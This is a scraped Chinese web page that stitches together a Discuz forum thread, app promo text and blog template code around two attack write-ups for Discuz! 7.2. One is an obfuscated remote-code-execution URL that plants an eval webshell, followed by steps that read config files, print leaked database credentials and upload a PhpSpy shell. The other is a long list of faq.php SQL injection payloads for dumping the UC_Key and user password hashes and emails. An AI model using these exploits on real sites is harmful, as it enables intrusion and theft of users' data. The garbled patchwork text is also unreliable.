Discuz! 7.2 怎么转换到PHPWind 7.0?谢谢了,大神帮忙啊_百度知道查看: 668|回复: 7
DZ7.2的IE9兼容补丁怎么还没有修正好
DZ7.2的IE9兼容补丁怎么还没有修正好,以前发布了一个,好像不能解决问题,是官方的技术不行,还是就不管了,有点让站长失望
具体啥问题呢?
在IE9下登录,一直停留在原界面
头像被屏蔽
提示: 作者被禁止或删除 内容自动屏蔽
官方x2 都没有完全解决ie9 兼容问题
修复 问题只针对默认模板。
使用的就是默认模板呢
Powered byDiscuz 7.2漏洞入侵图解
找到一个论坛,注册一个账号
注册好后,使用exp
复制以下代码:
http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
如若此处为空白,说明成功
存在该文件
php一句话连接forumdata/cache/usergroup_01.php
读取数据库连接文件
在模块中选择读取文件,并输入数据库连接文件的地址“****/dc/config.inc.php”,如图8所示,成功获取该论坛数据库的敏感信息: $dbhost = 'localhost'; // 数据库服务器 $dbuser = 'skycheer'; // 数据库用户名 $dbpw = 'sky0127'; // 数据库密码 $dbname = 'skycheer'; // 数据库名 $pconnect = 0;
使用一句话管理实在是不方便,在功能模块中选择上传文件,使用空的路径直接将本地的大马上传到一句话木马所在的路径,上传成功后直接访问,如图9所示,成功得到我们熟悉的PhpSpy ver 2008界面。至此已经获取Discuz!7.2版本的Webshell,大家都知道Discuz!论坛的Webshell很难拿到,因此本漏洞的珍稀程度可想而知。
Discuz!7.1&7.2远程溢出漏洞出来后,国内有关Discuz!的大中小论坛基本没有什么幸免,安全做的好的去掉了cache的执行权限,将其权限设置为无,逃过劫难。
友情提示:非法入侵他人站点,一切后果自负 上文出自77169 /techweb
利用:注册后登陆 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} 任意执行。
DZ 7.1、7.2 针对getshell的修复方法: 在common.inc.php上面加上$response=$scriptlang=array();&
这个洞t00ls团队发现的,DZ官方已经被人日过了。
官方补丁:
=============================================================================
截止到今天有这个洞的Dz论坛已经很少了,我刚才在谷歌翻了几篇,只找到一个有洞的,
其他的都补上了,可惜的是这个有洞的论坛用一句话连接后居然不显示文件路径,真是杯具!
本分类共有文章12篇,更多信息详见
& 2012 - 2016 &
&All Rights Reserved. &
/*爱悠闲图+*/
var cpro_id = "u1888441";
/*爱悠闲底部960*75*/
var cpro_id = "u1888128";Discuz! 官方站 -
Powered by Discuz!
后使用快捷导航没有帐号?
只需一步,快速开始
扫一扫,访问微社区
随时随地,快速访问
只要手机在手,您都可以快速、方便地看贴发帖,与论坛好友收发短消息。
极致优化,畅快"悦"读
独有的论坛界面和触屏设计,手机论坛也变得赏心悦目,操作自如。
即拍即发,分享生活
不管是风景图画,还是新闻现场,拍照发帖一气呵成,让您在论坛出尽风头。
下载客户端后,拍摄二维码快速访问本站:
或者通过以下地址访问:
Powered by温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
K8搞基大队队长 专注于被妞泡
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
&演示动画教程/s/1i3gNeW9/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23版本/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23数据库/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28database(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23MYSQL路径/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@basedir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23MYSQL数据路径/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@datadir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23tmdir/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@tmpdir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23uc_key 2次 64位& 不准& 默认搭建的可爆出 但实战有时也爆出90多位 实际人家才64位/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23&然后爆出uc key& 好像这个爆出来长度的样子 但实战不准 爆出100多位来&拿到shell进去发现key也是64位& 但是默认打键的 这个也能准确爆出exp1:/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23 &exp2:/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23 下面是K8脱库工具专用的脱库语句(因为有些站你拿不到shell也进不了后台时)脱库1 最大ID& '4063861' for key 'group_key' 后面多了一个1/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20max(uid)%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23脱库1 总数 263139/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat(count(*))%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23脱库1 用户 密码 邮箱 显示不完/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23脱库2 用户 密码 邮箱 显示不完/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23所以得分开脱& id 用户 密码 脱1次& ID和邮箱脱一次/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23ID和邮箱/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23脱库1 对应脱库语句/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23ID和邮箱/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23========================================================================================================脱库2 最大ID/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28max(uid)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23脱库2 总数 263139/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28count(*)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23脱库2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20cdb_uc_members where uid=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23针对dz7.2的两条脱库payload&因为有些站的表是& cdb_ucmembers 有些是uc_member其它程序注入 就另外写 id变量 $var$假设 where uid=1& 爆出id为1的信息where uid=$var$& 脱库语句就这样写
阅读(7613)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
在LOFTER的更多文章
loftPermalink:'',
id:'fks_',
blogTitle:'Discuz 7.2 faq.php SQL注入漏洞 爆管理员 爆UC_Key K8脱库专用语句',
blogAbstract:'Discuz 7.2 faq.php SQL注入漏洞 爆管理员 爆UC_Key K8脱库专用语句官方已出补丁&& 某些站正要XX的时候被人提交WOOYUN 被补了 尼码估计就只有那啥站上面有女神信息了 一小时不到补了 尼码..K8注入点脱库工具 暂不提供下载 & /k8gege因为临时应急而写的 不过也支持脱很多注入点的库了...DZ仅仅只是个例子 只要你把SQL语句里的ID=$var$ 就可脱没有SQLMAP那么麻烦 那么慢 也不会像BURP搞得卡死***超时2800多毫秒 都能正常脱库 不卡不搞死目标站',
blogTag:'discuz',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:3,
publishTime:8,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'K8搞基大队队长 专注于被妞泡',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}
